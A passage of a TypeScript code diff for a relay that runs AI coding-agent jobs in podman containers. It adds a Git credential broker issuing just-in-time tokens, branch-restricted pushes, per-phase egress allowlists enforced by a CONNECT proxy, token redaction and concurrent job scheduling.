+	leaseToken: string;
+	/** Worker /github-token endpoint for JIT token issuance. */
+	workerTokenUrl: string;
+	/** Fetch implementation override; defaults to the global fetch. */
+	fetchImpl?: (url: string | URL, init?: RequestInit) => Promise<Response>;
+}
+
+/**
+ * Start a per-job Git credential broker on a random loopback port.
+ *
+ * The broker holds the fence triple (never the installation token directly)
+ * and fetches a JIT token from the Worker on demand. This decouples the
+ * container from the real token: git inside the container calls the broker's
+ * /credential endpoint via the ompk-git-credential helper, and the broker
+ * returns fresh credentials without the token ever entering the container env.
+ *
+ * The broker additionally enforces branch naming via POST /push-check: the
+ * pre-push hook sends the target refs and the broker rejects anything outside
+ * the refs/heads/ompk/* namespace.
+ *
+ * Lifecycle: start before the agent container, stop in the job's finally block.
+ */
+export async function startGitBroker(options: GitBrokerOptions): Promise<GitBrokerHandle> {
+	const { jobId, attemptId, leaseToken, workerTokenUrl, fetchImpl = fetch } = options;
+
+	const server = Bun.serve({
+		hostname: "127.0.0.1",
+		port: 0, // OS picks a free port; available as server.port immediately.
+		async fetch(req: Request): Promise<Response> {
+			const url = new URL(req.url);
+
+			// GET /credential?host=<host>
+			// Called by the ompk-git-credential helper inside the container.
+			if (req.method === "GET" && url.pathname === "/credential") {
+				const host = url.searchParams.get("host") ?? "";
+				if (host !== "github.com") {
+					// Refuse credentials for any host other than github.com.
+					// This is defence-in-depth: the CONNECT proxy (follow-up) will
+					// provide network-level enforcement; the broker enforces at the
+					// credential-issuance layer.
+					return new Response(
+						`refused: credential broker only serves github.com (got: ${host})\n`,
+						{ status: 403 },
+					);
+				}
+				// Fetch a JIT token from the Worker using the fence triple.
+				let jitRes: Response;
+				try {
+					jitRes = await fetchImpl(workerTokenUrl, {
+						method: "POST",
+						headers: { "Content-Type": "application/json" },
+						body: JSON.stringify({ jobId, attemptId, leaseToken }),
+					});
+				} catch (err) {
+					const msg = err instanceof Error ? err.message : String(err);
+					return new Response(`JIT token fetch error: ${msg}\n`, { status: 502 });
+				}
+				if (!jitRes.ok) {
+					const body = await jitRes.text().catch(() => "");
+					return new Response(`JIT token fetch failed: ${jitRes.status} ${body}\n`, { status: 502 });
+				}
+				// Parse the token from the Worker response without using `any`.
+				const rawData: unknown = await jitRes.json().catch(() => null);
+				if (
+					rawData === null ||
+					typeof rawData !== "object" ||
+					!("token" in rawData) ||
+					typeof (rawData as Record<string, unknown>)["token"] !== "string" ||
+					(rawData as Record<string, unknown>)["token"] === ""
+				) {
+					return new Response("JIT token response has invalid or missing token\n", { status: 502 });
+				}
+				const jitToken = (rawData as Record<string, unknown>)["token"] as string;
+				return new Response(`username=x-access-token\npassword=${jitToken}\n`);
+			}
+
+			// POST /push-check
+			// Called by the pre-push hook inside the container before any push.
+			// Body: { refs: string[] } — the remote refs being pushed to.
+			if (req.method === "POST" && url.pathname === "/push-check") {
+				const rawBody: unknown = await req.json().catch(() => null);
+				const refs: string[] = [];
+				if (
+					rawBody !== null &&
+					typeof rawBody === "object" &&
+					"refs" in rawBody &&
+					Array.isArray((rawBody as Record<string, unknown>)["refs"])
+				) {
+					const rawRefs = (rawBody as Record<string, unknown[]>)["refs"];
+					for (const r of rawRefs) {
+						if (typeof r === "string") refs.push(r);
+					}
+				}
+				const rejected = refs.filter(ref => !/^refs\/heads\/ompk\//.test(ref));
+				if (rejected.length > 0) {
+					return new Response(
+						`push rejected: the following refs are outside the ompk/* namespace: ${rejected.join(", ")}\n`,
+						{ status: 403 },
+					);
+				}
+				return new Response("ok\n");
+			}
+
+			return new Response("not found\n", { status: 404 });
+		},
+	});
+
+	return {
+		url: `http://127.0.0.1:${server.port}`,
+		stop: async () => {
+			server.stop();
+		},
+	};
+}
+
+// ─── GitHub workspace and mirror helpers ──────────────────────────────────────
+
+export type RunGitFn = (
+	args: readonly string[],
+	cwd: string,
+	env: NodeJS.ProcessEnv,
+	redactionToken?: string,
+) => Promise<void>;
+
+export interface MirrorDependencies {
+	runGit?: RunGitFn;
+	mirrorExists?: (path: string) => Promise<boolean>;
+	makeDir?: (path: string) => Promise<void>;
+	warn?: (message: string) => void;
+}
+
+/** Stable, filesystem-safe bare mirror location for one GitHub repository. */
+export function deriveMirrorPath(root: string, owner: string, repo: string): string {
+	const name = `${owner}-${repo}.git`.replace(/[^A-Za-z0-9._-]/g, "_");
+	return join(root, ".mirrors", name);
+}
+
+/**
+ * Refresh/create a bare mirror, degrading to a full clone when any cache
+ * operation fails. A mirror is only an optimization, never a job dependency.
+ * Callers must hold the per-mirror lock before calling.
+ */
+export async function tryPrepareRepoMirror(
+	mirror: string,
+	cloneUrl: string,
+	env: NodeJS.ProcessEnv,
+	redactionToken: string | undefined,
+	dependencies: MirrorDependencies = {},
+): Promise<string | undefined> {
+	const runGitImpl = dependencies.runGit ?? runGit;
+	const mirrorExists = dependencies.mirrorExists ?? (path => Bun.file(join(path, "HEAD")).exists());
+	const makeDir =
+		dependencies.makeDir ??
+		(async path => {
+			await mkdir(path, { recursive: true });
+		});
+	const warn = dependencies.warn ?? (message => console.error(message));
+	try {
+		await makeDir(dirname(mirror));
+		if (await mirrorExists(mirror)) {
+			await runGitImpl(["remote", "update", "--prune"], mirror, env, redactionToken);
+		} else {
+			await runGitImpl(["clone", "--mirror", cloneUrl, mirror], dirname(mirror), env, redactionToken);
+		}
+		return mirror;
+	} catch (err) {
+		const rawMessage = err instanceof Error ? err.message : String(err);
+		const message = redactionToken ? rawMessage.replaceAll(redactionToken, "[redacted]") : rawMessage;
+		warn(`[${new Date().toISOString()}] GitHub mirror cache unavailable; using full clone: ${message}`);
+		return undefined;
+	}
+}
+
+/** Workspace clones detach from the mirror so later pruning cannot break them. */
+export function buildWorkspaceCloneArgs(
+	cloneUrl: string,
+	workspace: string,
+	mirror: string | undefined,
+): string[] {
+	return [
+		"clone",
+		"--origin",
+		"origin",
+		...(mirror ? ["--reference-if-able", mirror, "--dissociate"] : []),
+		cloneUrl,
+		workspace,
+	];
+}
+
+export interface CloneFallbackDependencies {
+	runGit?: RunGitFn;
+	removeWorkspace?: (path: string) => Promise<void>;
+	warn?: (message: string) => void;
+}
+
+/** Retry without the cache when a referenced clone exposes mirror damage. */
+export async function cloneWorkspaceWithMirrorFallback(
+	cloneUrl: string,
+	workspace: string,
+	mirror: string | undefined,
+	cwd: string,
+	env: NodeJS.ProcessEnv,
+	redactionToken: string | undefined,
+	dependencies: CloneFallbackDependencies = {},
+): Promise<void> {
+	const runGitImpl = dependencies.runGit ?? runGit;
+	const removeWorkspace =
+		dependencies.removeWorkspace ??
+		(async path => {
+			await rm(path, { recursive: true, force: true });
+		});
+	const warn = dependencies.warn ?? (message => console.error(message));
+	if (!mirror) {
+		await runGitImpl(buildWorkspaceCloneArgs(cloneUrl, workspace, undefined), cwd, env, redactionToken);
+		return;
+	}
+	try {
+		await runGitImpl(buildWorkspaceCloneArgs(cloneUrl, workspace, mirror), cwd, env, redactionToken);
+	} catch (err) {
+		const rawMessage = err instanceof Error ? err.message : String(err);
+		const message = redactionToken ? rawMessage.replaceAll(redactionToken, "[redacted]") : rawMessage;
+		warn(`[${new Date().toISOString()}] GitHub reference clone failed; retrying full clone: ${message}`);
+		await removeWorkspace(workspace);
+		await runGitImpl(buildWorkspaceCloneArgs(cloneUrl, workspace, undefined), cwd, env, redactionToken);
+	}
+}
+
+async function runGit(
+	args: readonly string[],
+	cwd: string,
+	env: NodeJS.ProcessEnv,
+	redactionToken?: string,
+): Promise<void> {
+	const proc = Bun.spawn(["git", ...args], { cwd, env, stdout: "pipe", stderr: "pipe" });
+	const exitCode = await proc.exited;
+	if (exitCode !== 0) {
+		const rawError = proc.stderr ? await new Response(proc.stderr).text() : "";
+		const error = redactionToken ? rawError.replaceAll(redactionToken, "[redacted]") : rawError;
+		throw new Error(`git ${args[0] ?? "command"} failed: ${error.trim() || `exit code ${exitCode}`}`);
+	}
+}
+
+/**
+ * Clone the repo into a fresh per-job workspace. Uses the lease-time token
+ * for the clone (performed immediately after poll, within the 1-hour window).
+ * Subsequent git operations in the agent use the JIT credential helper.
+ */
+async function prepareGitHubWorkspace(job: Job): Promise<string> {
+	if (!job.github || !job.githubToken) throw new Error("GitHub job is missing repository credentials");
+	const workspace = join(
+		GITHUB_WORKSPACE_ROOT,
+		`${job.github.owner}-${job.github.repo}-${job.id}`.replace(/[^A-Za-z0-9._-]/g, "_"),
+	);
+	await mkdir(GITHUB_WORKSPACE_ROOT, { recursive: true });
+	await rm(workspace, { recursive: true, force: true });
+
+	// The clone uses the lease-time token via insteadOf URL rewriting.
+	// The agent's subsequent git operations use the JIT credential helper instead.
+	const gitEnv = {
+		...process.env,
+		GIT_CONFIG_COUNT: "1",
+		GIT_CONFIG_KEY_0: `url.https://x-access-token:${job.githubToken}@github.com/.insteadOf`,
+		GIT_CONFIG_VALUE_0: "https://github.com/",
+	};
+	const cloneUrl = `https://github.com/${job.github.owner}/${job.github.repo}.git`;
+	const mirrorPath = deriveMirrorPath(GITHUB_WORKSPACE_ROOT, job.github.owner, job.github.repo);
+
+	// Mirror operations serialize per path; the per-repo job mutex already
+	// prevents same-repo jobs from overlapping, but the explicit lock makes
+	// the invariant visible and guards against future refactors.
+	const mirror = await withLock(mirrorLocks, mirrorPath, () =>
+		tryPrepareRepoMirror(mirrorPath, cloneUrl, gitEnv, job.githubToken),
+	);
+
+	await cloneWorkspaceWithMirrorFallback(
+		cloneUrl,
+		workspace,
+		mirror,
+		GITHUB_WORKSPACE_ROOT,
+		gitEnv,
+		job.githubToken,
+	);
+
+	if (job.github.headRef) {
+		await runGit(
+			["checkout", "-B", job.github.headRef, `origin/${job.github.headRef}`],
+			workspace,
+			gitEnv,
+			job.githubToken,
+		);
+	} else {
+		const branch = `ompk/issue-${job.github.number}-${job.id.slice(0, 8)}`;
+		await runGit(
+			["checkout", "-B", branch, `origin/${job.github.defaultBranch}`],
+			workspace,
+			gitEnv,
+			job.githubToken,
+		);
+	}
+	return workspace;
+}
+
+// ─── Fence environment ────────────────────────────────────────────────────────
+
+/**
+ * Child environment for one attempt: the fence triple (the pre-push guard's
+ * credential — never the relay bearer token) plus a `core.hooksPath` override
+ * so every git invocation in the child tree runs the fence guard.
+ *
+ * GitHub jobs additionally receive:
+ *   GH_TOKEN          — lease-time token for `gh` CLI calls (≤1 h window).
+ *   OMPK_TOKEN_URL    — Worker /github-token endpoint for JIT refresh.
+ *   credential.helper — relay-shipped script that fetches a fresh token at
+ *                       the exact moment git needs credentials for push.
+ *
+ * In bare (non-container) mode this env is passed directly to the child. In
+ * container mode buildContainerArgs() uses the fence vars from this env but
+ * replaces the GH_TOKEN path with the credential broker (OMPK_BROKER_URL).
+ *
+ * Bare mode is documented as unfenced with respect to network egress.
+ */
+export function fenceEnv(job: Job): NodeJS.ProcessEnv {
+	const githubAuth =
+		job.source === "github" && job.githubToken
+			? {
+					GH_TOKEN: job.githubToken,
+					OMPK_TOKEN_URL: `${WORKER_URL}/github-token`,
+					GIT_CONFIG_COUNT: "2",
+					GIT_CONFIG_KEY_1: "credential.helper",
+					GIT_CONFIG_VALUE_1: CREDENTIAL_HELPER,
+				}
+			: { GIT_CONFIG_COUNT: "1" };
 	return {
 		...process.env,
 		OMPK_FENCE_URL: `${WORKER_URL}/fence-check`,
 		OMPK_FENCE_JOB: job.id,
 		OMPK_FENCE_ATTEMPT: job.attemptId,
 		OMPK_FENCE_TOKEN: job.leaseToken,
-		GIT_CONFIG_COUNT: "1",
 		GIT_CONFIG_KEY_0: "core.hooksPath",
 		GIT_CONFIG_VALUE_0: GIT_HOOKS_DIR,
+		...githubAuth,
 	};
 }
 
-async function runOnce(token: string, allowedModels: readonly string[]): Promise<boolean> {
-	const job = await pollJob(token);
-	if (!job) return false;
+/** Remove the ephemeral installation token from any relay-reported text. */
+export function scrubJobResult(result: JobRunResult, secret: string | undefined): JobRunResult {
+	if (!secret) return result;
+	return {
+		...result,
+		output: result.output.replaceAll(secret, "[redacted]"),
+		...(result.error !== undefined ? { error: result.error.replaceAll(secret, "[redacted]") } : {}),
+	};
+}
 
-	console.log(`[${new Date().toISOString()}] running job ${job.id} (${job.issueIdentifier}, model=${job.model})`);
+// ─── Job execution ────────────────────────────────────────────────────────────
+
+/** ISO timestamp string for log lines. */
+function ts(): string {
+	return new Date().toISOString();
+}
+
+/**
+ * Core job runner: workspace preparation, broker start, heartbeat, setup hook,
+ * agent execution, and result submit. Assumes the per-repo mutex is already
+ * held by the caller (runJob).
+ */
+async function runJobCore(token: string, allowedModels: readonly string[], job: Job): Promise<void> {
+	console.log(`[${ts()}] running job ${job.id} (${job.issueIdentifier}, model=${job.model})`);
 	let child: ChildProcess | undefined;
 	let fenceLost = false;
+	let workspace: string | undefined;
+	let broker: GitBrokerHandle | undefined;
+	let activeContainerName: string | undefined;
+	let containerStop: Promise<void> | undefined;
+
+	// Cleanly terminate the active child: uses podman rm --force for named
+	// containers, SIGKILL on the process group for bare-mode children.
+	const stopActiveContainer = (): Promise<void> => {
+		if (activeContainerName) {
+			containerStop ??= stopNamedContainer(activeContainerName, child).catch(err => {
+				console.error(
+					`[${ts()}] failed to remove container ${activeContainerName}: ${err instanceof Error ? err.message : err}`,
+				);
+			});
+			return containerStop;
+		}
+		if (child) forceKillChildTree(child);
+		return Promise.resolve();
+	};
+
+	// Register the spawned child so stopActiveContainer / fence-kill know where
+	// to aim. In container mode, also records the container name.
+	const registerChild =
+		(containerName?: string) =>
+		(spawned: ChildProcess): void => {
+			child = spawned;
+			activeContainerName = containerName;
+			containerStop = undefined;
+			// If the fence was already lost by the time spawn returned, kill
+			// immediately rather than letting the container run orphaned.
+			if (fenceLost) void stopActiveContainer();
+		};
+
 	const cadence = job.heartbeatMs ?? HEARTBEAT_FALLBACK_MS;
 	const beat = setInterval(() => {
 		void sendHeartbeat(token, job).then(live => {
 			if (live || fenceLost) return;
 			fenceLost = true;
-			console.error(`[${new Date().toISOString()}] lease for job ${job.id} was fenced off; killing runner`);
-			child?.kill();
+			console.error(`[${ts()}] lease for job ${job.id} was fenced off; killing runner`);
+			void stopActiveContainer();
 		});
 	}, cadence);
+
 	try {
-		const result = await executeJob(job, allowedModels, spawn, JOB_TIMEOUT_MS, {
-			onSpawn: spawned => {
-				child = spawned;
-			},
-			env: fenceEnv(job),
-		});
-		if (fenceLost) {
-			console.error(`[${new Date().toISOString()}] job ${job.id} discarded: lease no longer held`);
-			return true;
+		try {
+			workspace = job.source === "github" ? await prepareGitHubWorkspace(job) : undefined;
+			if (fenceLost) {
+				console.error(`[${ts()}] job ${job.id} discarded: lease no longer held`);
+				return;
+			}
+			const executionWorkspace = workspace ?? WORKSPACE_DIR;
+			const agentEnv = fenceEnv(job);
+			const containerOptions: ContainerRunOptions | undefined = CONTAINER_IMAGE
+				? {
+						image: CONTAINER_IMAGE,
+						memory: CONTAINER_MEMORY,
+						pidsLimit: CONTAINER_PIDS_LIMIT,
+						gitHooksDir: GIT_HOOKS_DIR,
+					}
+				: undefined;
+
+			// Start the per-job credential broker when running in container mode
+			// for a GitHub job. The broker's URL is passed into the container via
+			// OMPK_BROKER_URL so git credentials are never part of the container env.
+			if (containerOptions && job.source === "github" && job.githubToken) {
+				broker = await startGitBroker({
+					jobId: job.id,
+					attemptId: job.attemptId,
+					leaseToken: job.leaseToken,
+					workerTokenUrl: `${WORKER_URL}/github-token`,
+				});
+			}
+
+			const setupContainerName = containerOptions
+				? deriveContainerName(job.id, job.attemptId, "setup")
+				: undefined;
+			const agentContainerName = containerOptions
+				? deriveContainerName(job.id, job.attemptId, "agent")
+				: undefined;
+
+			let result: JobRunResult;
+
+			if (!allowedModels.includes(job.model)) {
+				result = {
+					success: false,
+					output: "",
+					error: "model is not on this relay's allowlist (OMPK_RELAY_MODELS)",
+					failureClass: "transient",
+				};
+			} else {
+				if (fenceLost) {
+					console.error(`[${ts()}] job ${job.id} discarded: lease no longer held`);
+					return;
+				}
+
+				// Run the repo-declared .ompk/setup.sh hook when present.
+				const setupEnv = buildSetupHookEnv();
+				const setupResult = await runSetupHook(executionWorkspace, {
+					spawn,
+					timeoutMs: SETUP_TIMEOUT_MS,
+					env: setupEnv,
+					redactionToken: job.githubToken,
+					onSpawn: registerChild(setupContainerName),
+					...(containerOptions && setupContainerName
+						? {
+								command: CONTAINER_BIN,
+								args: buildContainerSetupArgs(executionWorkspace, setupEnv, {
+									...containerOptions,
+									name: setupContainerName,
+								}),
+								nonZeroFailureClass: "transient" as const,
+								onTimeout: () => stopNamedContainer(setupContainerName, child),
+							}
+						: {}),
+				});
+
+				if (fenceLost) {
+					console.error(`[${ts()}] job ${job.id} discarded: lease no longer held`);
+					return;
+				}
+
+				if (setupResult !== undefined) {
+					result = setupResult;
+				} else {
+					result = await executeJob(job, allowedModels, spawn, JOB_TIMEOUT_MS, {
+						onSpawn: registerChild(agentContainerName),
+						...(containerOptions && agentContainerName
+							? {
+									command: CONTAINER_BIN,
+									args: buildContainerArgs(job, executionWorkspace, agentEnv, {
+										...containerOptions,
+										name: agentContainerName,
+									}, broker?.url),
+									cwd: WORKSPACE_DIR,
+									nonZeroFailureClass: "transient" as const,
+									onTimeout: () => stopNamedContainer(agentContainerName, child),
+									detached: process.platform !== "win32",
+								}
+							: {
+									env: agentEnv,
+									cwd: executionWorkspace,
+								}),
+					});
+				}
+			}
+
+			if (fenceLost) {
+				console.error(`[${ts()}] job ${job.id} discarded: lease no longer held`);
+				return;
+			}
+			await submitResult(token, job, scrubJobResult(result, job.githubToken));
+			console.log(`[${ts()}] job ${job.id} ${result.success ? "succeeded" : "failed"}`);
+		} catch (err) {
+			const result: JobRunResult = {
+				success: false,
+				output: "",
+				error: err instanceof Error ? err.message : "workspace preparation failed",
+				failureClass: "transient",
+			};
+			if (!fenceLost) await submitResult(token, job, scrubJobResult(result, job.githubToken));
 		}
-		await submitResult(token, job, result);
-		console.log(`[${new Date().toISOString()}] job ${job.id} ${result.success ? "succeeded" : "failed"}`);
 	} finally {
 		clearInterval(beat);
+		if (containerStop) await containerStop;
+		await broker
+			?.stop()
+			.catch(err =>
+				console.error(`[${ts()}] broker stop failed: ${err instanceof Error ? err.message : err}`),
+			);
+		if (workspace) await rm(workspace, { recursive: true, force: true }).catch(() => undefined);
 	}
-	return true;
 }
+
+/**
+ * Acquire the per-repo mutex then run the job. Same-repo jobs serialize;
+ * jobs for different repos (or different Linear issues) run concurrently up
+ * to MAX_CONCURRENT_JOBS.
+ */
+async function runJob(token: string, allowedModels: readonly string[], job: Job): Promise<void> {
+	const repoKey =
+		job.source === "github" && job.github
+			? `github:${job.github.owner}/${job.github.repo}`
+			: `linear:${job.issueId}`;
+	return withLock(repoLocks, repoKey, () => runJobCore(token, allowedModels, job));
+}
+
+// ─── Main loop ────────────────────────────────────────────────────────────────
 
 async function main(): Promise<void> {
 	if (!RELAY_TOKEN) {
@@ -311,17 +1390,46 @@ async function main(): Promise<void> {
 		process.exit(1);
 	}
 	console.log(
-		`ompk relay "${RELAY_NAME}" starting — polling ${WORKER_URL} every ${POLL_INTERVAL_MS}ms, ${allowedModels.length} allowed model(s)`,
+		`ompk relay "${RELAY_NAME}" starting — polling ${WORKER_URL} every ${POLL_INTERVAL_MS}ms, ` +
+			`${allowedModels.length} allowed model(s), max ${MAX_CONCURRENT_JOBS} concurrent job(s)` +
+			(CONTAINER_IMAGE ? `, container image: ${CONTAINER_IMAGE}` : ", bare mode (unfenced egress)"),
 	);
 	await announceStartup(RELAY_TOKEN);
+
+	// Slot counter: tracks polled-but-not-yet-finished jobs (including those
+	// waiting for the per-repo mutex). Capped at MAX_CONCURRENT_JOBS before
+	// each poll so we never hold more leases than we can service.
+	let activeCount = 0;
+
 	for (;;) {
-		try {
-			const ranSomething = await runOnce(RELAY_TOKEN, allowedModels);
-			if (!ranSomething) await Bun.sleep(POLL_INTERVAL_MS);
-		} catch (err) {
-			console.error("relay loop error:", err instanceof Error ? err.message : err);
+		if (activeCount >= MAX_CONCURRENT_JOBS) {
 			await Bun.sleep(POLL_INTERVAL_MS);
+			continue;
 		}
+		let job: Job | null;
+		try {
+			job = await pollJob(RELAY_TOKEN);
+		} catch (err) {
+			console.error(`[${ts()}] poll error:`, err instanceof Error ? err.message : err);
+			await Bun.sleep(POLL_INTERVAL_MS);
+			continue;
+		}
+		if (!job) {
+			await Bun.sleep(POLL_INTERVAL_MS);
+			continue;
+		}
+		activeCount++;
+		void runJob(RELAY_TOKEN, allowedModels, job)
+			.catch(err => {
+				console.error(
+					`[${ts()}] uncaught error in job ${job!.id}:`,
+					err instanceof Error ? err.message : err,
+				);
+			})
+			.finally(() => {
+				activeCount--;
+			});
+		// No sleep: immediately attempt to fill the next concurrent slot.
 	}
 }
 

--- a/packages/ompk-linear-agent/relay/relay.ts
+++ b/packages/ompk-linear-agent/relay/relay.ts
@@ -22,17 +22,16 @@
  * Container isolation
  * -------------------
  * When OMPK_RELAY_CONTAINER_IMAGE is set, each job phase runs inside a
- * per-phase podman container. The agent phase uses a Git credential broker
- * (loopback HTTP server, one per job) so the GitHub installation token never
- * enters the container environment or logs. The broker also enforces
- * push-to-ompk/*-branches-only; the pre-push hook reads OMPK_BROKER_URL and
- * validates remote refs before any push is allowed.
- *
- * NOTE: Per-job podman network + CONNECT proxy (egress allow-listing by phase)
- * are tracked in issue #41 as a follow-up. Currently containers run with
- * --network=host; the broker limits token exposure but outbound egress is still
- * unrestricted. The acceptance criterion "agent phase cannot reach arbitrary
- * hosts" requires the follow-up proxy implementation.
+ * per-phase podman container backed by a per-job isolated podman network.
+ * A stage-scoped CONNECT proxy enforces egress policy:
+ *   setup phase  → package registries + github.com
+ *   agent phase  → Anthropic API only; GitHub access is mediated by the broker
+ * The agent phase uses a Git credential broker (loopback HTTP server, one per
+ * job) so the GitHub installation token never enters the container environment
+ * or logs. The broker also enforces push-to-ompk/*-branches-only; the
+ * pre-push hook calls OMPK_BROKER_URL and validates remote refs before any
+ * push is allowed. Fence checks and git operations are routed through the
+ * broker so the container needs no direct Worker or github.com connectivity.
  *
  * Just-in-time publish token
  * --------------------------
@@ -63,9 +62,133 @@
 
 import { type ChildProcess, spawn } from "node:child_process";
 import { mkdir, rm } from "node:fs/promises";
+import { createConnection, createServer, type AddressInfo } from "node:net";
 import { hostname } from "node:os";
 import { dirname, join } from "node:path";
 import { fileURLToPath } from "node:url";
+
+// ─── Stage-scoped egress policy ───────────────────────────────────────────────
+
+/**
+ * CONNECT proxy allowlist for the repo setup phase.
+ * Grants outbound access to package registries and GitHub (for dependency
+ * sources), but nothing else. All entries are "host:port" strings.
+ */
+export const SETUP_ALLOWED_HOSTS: ReadonlySet<string> = new Set([
+	"github.com:443",
+	"api.github.com:443",
+	"codeload.github.com:443",
+	"objects.githubusercontent.com:443",
+	"raw.githubusercontent.com:443",
+	// npm / yarn / pnpm
+	"registry.npmjs.org:443",
+	"registry.npmjs.org:80",
+	"registry.yarnpkg.com:443",
+	// PyPI
+	"pypi.org:443",
+	"files.pythonhosted.org:443",
+	// Rust / crates.io
+	"crates.io:443",
+	"static.crates.io:443",
+]);
+
+/**
+ * CONNECT proxy allowlist for the agent execution phase.
+ * Only the Anthropic API is reachable directly; GitHub access is mediated
+ * exclusively through the per-job credential broker (/gh/ proxy routes),
+ * so the real installation token never enters the container environment.
+ */
+export const AGENT_ALLOWED_HOSTS: ReadonlySet<string> = new Set([
+	"api.anthropic.com:443",
+]);
+
+/** Handle returned by startEgressProxy. */
+export interface EgressProxyHandle {
+	/** Port the proxy is listening on. */
+	readonly port: number;
+	/** Stop the proxy server and release the port. */
+	stop(): void;
+}
+
+/**
+ * Start a per-job HTTP CONNECT proxy on a random port.
+ *
+ * Only CONNECT-method tunnels are handled; plain HTTP forwarding is
+ * intentionally unsupported (the container should use NO_PROXY for any
+ * HTTP-only traffic to the gateway/broker).
+ *
+ * Phase controls the allowlist:
+ *   setup  → SETUP_ALLOWED_HOSTS  (registries + github.com)
+ *   agent  → AGENT_ALLOWED_HOSTS  (Anthropic API only; git goes via broker)
+ *
+ * Blocked destinations receive 403; unreachable allowed destinations 502.
+ * Fail-closed: malformed CONNECT requests get 400 and the socket is destroyed.
+ *
+ * @param phase       "setup" or "agent"
+ * @param bindAddress Address to listen on; defaults to "0.0.0.0" so the
+ *                    proxy is reachable from inside a per-job podman network
+ *                    via the bridge gateway address.
+ */
+export function startEgressProxy(
+	phase: "setup" | "agent",
+	bindAddress = "0.0.0.0",
+): Promise<EgressProxyHandle> {
+	const allowed = phase === "setup" ? SETUP_ALLOWED_HOSTS : AGENT_ALLOWED_HOSTS;
+	return new Promise<EgressProxyHandle>((resolve, reject) => {
+		const server = createServer(clientSocket => {
+			let buf = "";
+			clientSocket.on("error", () => {});
+			clientSocket.on("data", function onData(chunk: Buffer) {
+				buf += chunk.toString("binary");
+				const headEnd = buf.indexOf("\r\n\r\n");
+				if (headEnd === -1) return;
+				clientSocket.removeListener("data", onData);
+
+				const firstLine = buf.slice(0, buf.indexOf("\r\n"));
+				const m = /^CONNECT ([^\s:]+):(\d+) HTTP\/1\.[01]$/.exec(firstLine);
+				if (!m) {
+					clientSocket.write("HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n");
+					clientSocket.destroy();
+					return;
+				}
+				const host = m[1]!;
+				const port = parseInt(m[2]!, 10);
+				const target = `${host}:${port}`;
+
+				if (!allowed.has(target)) {
+					const msg = `CONNECT to ${target} denied by ompk egress policy (${phase} phase)`;
+					clientSocket.write(
+						`HTTP/1.1 403 Forbidden\r\nContent-Type: text/plain\r\nContent-Length: ${msg.length}\r\n\r\n${msg}`,
+					);
+					clientSocket.destroy();
+					return;
+				}
+
+				const upstream = createConnection({ host, port }, () => {
+					clientSocket.write("HTTP/1.1 200 Connection Established\r\n\r\n");
+					// Flush any bytes already received after the CONNECT headers.
+					const tail = buf.slice(headEnd + 4);
+					if (tail.length > 0) upstream.write(Buffer.from(tail, "binary"));
+					upstream.pipe(clientSocket);
+					clientSocket.pipe(upstream);
+				});
+				upstream.on("error", () => {
+					if (!clientSocket.destroyed) {
+						clientSocket.write("HTTP/1.1 502 Bad Gateway\r\nContent-Length: 0\r\n\r\n");
+						clientSocket.destroy();
+					}
+				});
+				clientSocket.on("error", () => upstream.destroy());
+			});
+		});
+
+		server.on("error", reject);
+		server.listen(0, bindAddress, () => {
+			const { port } = server.address() as AddressInfo;
+			resolve({ port, stop: () => server.close() });
+		});
+	});
+}
 
 const WORKER_URL = process.env.WORKER_URL ?? "https://ompk-linear-agent.pkkidking.workers.dev";
 const RELAY_TOKEN = process.env.RELAY_TOKEN;
@@ -479,6 +602,25 @@ export interface ContainerRunOptions {
 	home?: string;
 	gitHooksDir?: string;
 	name?: string;
+	/**
+	 * Per-job podman network name. When set, containers join this network
+	 * instead of the host network. Callers must create the network before
+	 * launching containers and remove it in the job's finally block.
+	 * Defaults to "host" (bare host network, the previous behaviour).
+	 */
+	network?: string;
+	/**
+	 * HTTP_PROXY / HTTPS_PROXY value injected into the container environment
+	 * so all internet-bound traffic is routed through the stage-scoped egress
+	 * proxy. When absent no proxy vars are injected.
+	 */
+	egressProxyUrl?: string;
+	/**
+	 * NO_PROXY value injected into the container environment. Typically the
+	 * podman network gateway address so the credential broker is reachable
+	 * without being routed through the CONNECT proxy.
+	 */
+	noProxyHosts?: string;
 }
 
 function appendContainerEnv(args: string[], env: NodeJS.ProcessEnv): void {
@@ -503,10 +645,11 @@ function buildContainerBaseArgs(
 		"/workspace",
 		"--tmpfs",
 		`${home}:rw,mode=700`,
-		// TODO(#41 follow-up): Replace --network=host with a per-job podman
-		// network routed through the CONNECT proxy so the agent phase can only
-		// reach the Anthropic API and the local credential broker.
-		"--network=host",
+		// Use the per-job isolated network when provided; fall back to host
+		// network for backwards compat (bare mode / no podman network).
+		`--network=${options.network ?? "host"}`,
+		// Suppress podman's automatic HTTP_PROXY injection; we inject our own
+		// stage-scoped proxy URL via the container environment explicitly.
 		"--http-proxy=false",
 		"--memory",
 		options.memory ?? CONTAINER_MEMORY,
@@ -530,10 +673,15 @@ export function deriveContainerName(jobId: string, attemptId: string, phase: "se
 /**
  * Build a podman-compatible container argv for the untrusted agent phase.
  *
- * Security: GH_TOKEN is never placed in the container env. When a broker URL
- * is provided, the container's git credential helper is pointed at the local
- * broker instead, which issues JIT tokens without the container ever seeing
- * the underlying installation token.
+ * Security invariants:
+ *   - GH_TOKEN never enters the container env. Git credentials are brokered.
+ *   - When a broker URL is provided, OMPK_FENCE_URL is redirected to the
+ *     broker's /fence-check endpoint so fence validation does not require
+ *     direct Worker connectivity from the container.
+ *   - The insteadOf rewrite redirects all github.com git traffic through the
+ *     broker's /gh/ proxy so the agent phase needs no direct github.com access.
+ *   - When options.egressProxyUrl is set, HTTP_PROXY / HTTPS_PROXY / NO_PROXY
+ *     are injected so all internet traffic flows through the stage-scoped proxy.
  */
 export function buildContainerArgs(
 	job: Pick<Job, "model" | "prompt" | "source">,
@@ -560,15 +708,35 @@ export function buildContainerArgs(
 	}
 
 	if (job.source === "github" && brokerUrl) {
-		// Broker mode: the credential helper inside the container calls the
-		// local broker instead of the Worker directly. The real token stays on
-		// the host. GH_TOKEN is never set in the container env.
+		// Broker mode: route all github.com git traffic and fence checks through
+		// the per-job credential broker so the agent container needs no direct
+		// connectivity to github.com or the Cloudflare Worker.
+		//
+		// git config layout (index 0 is always core.hooksPath):
+		//   1: credential.helper → ompk-git-credential (fetches JIT token from broker)
+		//   2: url.${brokerUrl}/gh/.insteadOf → https://github.com/
+		//      Rewrites all github.com HTTPS URLs to the broker's /gh/ HTTP proxy
+		//      so git never makes a direct TLS connection to github.com.
 		containerEnv.OMPK_BROKER_URL = brokerUrl;
-		containerEnv.GIT_CONFIG_COUNT = "2";
